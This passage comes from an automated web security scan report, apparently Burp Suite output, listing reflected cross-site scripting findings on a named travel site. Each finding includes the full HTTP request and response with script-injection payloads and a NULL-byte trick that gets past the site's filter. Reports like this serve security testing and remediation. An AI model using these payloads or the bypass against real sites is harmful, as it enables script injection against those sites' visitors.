User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622037; expires=Tue, 02-Oct-2012 01:07:17 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:17 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13537


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home79af8"><script>alert(1)</script>8f014a76d97/products_services">
...[SNIP]...

4.361. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0060a0b"><a>1e2cd697e59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60a0b"><a>1e2cd697e59 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/travel_agency/contracts/?%0060a0b"><a>1e2cd697e59=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621887; expires=Tue, 02-Oct-2012 01:04:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:04:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/travel_agency/contracts/?%0060a0b"><a>1e2cd697e59=1">
...[SNIP]...

4.362. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00b86bc<a>3b3252b8864 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b86bc<a>3b3252b8864 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/travel_agency/contracts/?%00b86bc<a>3b3252b8864=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:05:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621930; expires=Tue, 02-Oct-2012 01:05:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:05:31 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>3b3252b8864=1">?%00b86bc<a>3b3252b8864=1</a>
...[SNIP]...

4.363. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de283"><script>alert(1)</script>166290c97fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /homede283"><script>alert(1)</script>166290c97fc/products_services/travel_agency/contracts/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622027; expires=Tue, 02-Oct-2012 01:07:07 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/homede283"><script>alert(1)</script>166290c97fc/products_services">
...[SNIP]...

4.364. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a210c<a>9c3419cad76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homea210c<a>9c3419cad76/products_services/travel_agency/contracts/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622035; expires=Tue, 02-Oct-2012 01:07:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:15 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13608


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>9c3419cad76">homea210c<a>9c3419cad76</a>
...[SNIP]...

4.365. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %008d8ab<a>d3ab6ad4db6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d8ab<a>d3ab6ad4db6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/travel_agency/contracts/images/loadingAnimation.gif?%008d8ab<a>d3ab6ad4db6=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:05:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621929; expires=Tue, 02-Oct-2012 01:05:29 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:05:30 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>d3ab6ad4db6=1">loadingAnimation.gif?%008d8ab<a>d3ab6ad4db6=1</a>
...[SNIP]...

4.366. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b96a6"><a>7f830de7a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b96a6"><a>7f830de7a83 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/travel_agency/contracts/images/loadingAnimation.gif?%00b96a6"><a>7f830de7a83=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621878; expires=Tue, 02-Oct-2012 01:04:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:04:39 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/travel_agency/contracts/images/loadingAnimation.gif?%00b96a6"><a>7f830de7a83=1">
...[SNIP]...

4.367. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f73c4<a>d21c8301381 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homef73c4<a>d21c8301381/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621516; expires=Tue, 02-Oct-2012 00:58:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>d21c8301381">homef73c4<a>d21c8301381</a>
...[SNIP]...

4.368. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d87"><script>alert(1)</script>fb97ed1345c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home83d87"><script>alert(1)</script>fb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621516; expires=Tue, 02-Oct-2012 00:58:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13577


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87"><script>alert(1)</script>fb97ed1345c/search">
...[SNIP]...

4.369. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9041d<a>d45b727a2a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C9041d<a>d45b727a2a6/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
